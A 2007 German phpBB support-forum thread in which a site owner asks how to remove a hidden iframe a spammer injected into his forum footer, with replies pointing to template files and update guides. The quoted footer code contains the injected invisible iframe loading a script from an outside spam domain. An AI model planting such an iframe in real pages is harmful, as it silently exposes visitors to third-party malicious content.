Seite 1 von 1

Hilfe - Ein xxx spammer hat mich mit i-frame erwischt

Verfasst: 28.12.2007 08:32
von ProData
Hallo Gemeinde

Ich hab ein problem. ich hab zufaellig rausgekriegt dass ein spammer in meinem forum ein i-frame eingebaut hat.

Wie werd ich das wieder los? und wie kann ich verhindern das das passiert?
Kann ich das forum einfach updaten auf 3.0? Muss wohl zuerst das monster loswerden oder?

Das ganze sieht so aus:

Code: Alles auswählen

<div id="footermsg" style="width:100%">All Logos and Trademarks in this site are property of their respective owner.
All Comments and Forum Messages are property of their respective posters. 
All other Content is Copyright © 2004-2007 by 
<a href='http://www.diveshopsoftware.com'> DiveShopSoftware.com </a> Webdesign by 
<a href='http://www.prodata-software.com'> ProData Software for Dive Resorts</a> & <a href="http://newsletter-factory.com">Newsletter Software </a>Sponsor of <a href="http://kohtao-community.com">Koh Tao Community.com </a>

<iframe src="http://www.yourxxxblog.biz/js_go_f1.php" style="display:none"></iframe>

</div>

</body>
</html>

Verfasst: 28.12.2007 08:41
von gloriosa
Hallo,
erst einmal den Code entfernen und dann Updaten (siehe dazu die >>> Update-Hilfe <<< :wink: ) ! :o

Weiterer Lesestoff : >>> KB:sicher <<< ! :wink:

Wo ist der code?

Verfasst: 28.12.2007 10:23
von ProData
Danke fuer die links. Kannst du mir vielleicht sagen wo der code zu entfernen ist und was mich noch mehr interessiert, wie kommt der da ueberhaupt rein? Das letztere ist mehr zum allgemeinen verstaendnis.
Der nichtsnutz hat doch gar keinen server zugriff...oder wie oder was?

Danke fuer die hilfe

Verfasst: 28.12.2007 10:44
von gloriosa
Hallo,
das Warum und Wieso zu erörtern ist müßig, deshalb dazu keine Antwort. :D

Ansonsten solltest Du Dir die jeweilige index_body.tpl, overall_header.tpl und overall:footer.tpl ansehen. :wink:

Verfasst: 28.12.2007 11:12
von larsneo
wenn du von den seiten aus deiner signatur sprichst - hier solltest du unbedingt das zugrundeliegende cms aktualisieren sowie das forenmodul kontrollieren. ich hatte unlängst einen ähnlichen fall zur analyse der auf einer schwachstelle in /modules/PNphpBB2/includes/forums_admin.php beruhte (und eigentlich bereits seit 2005 gefixt ist)...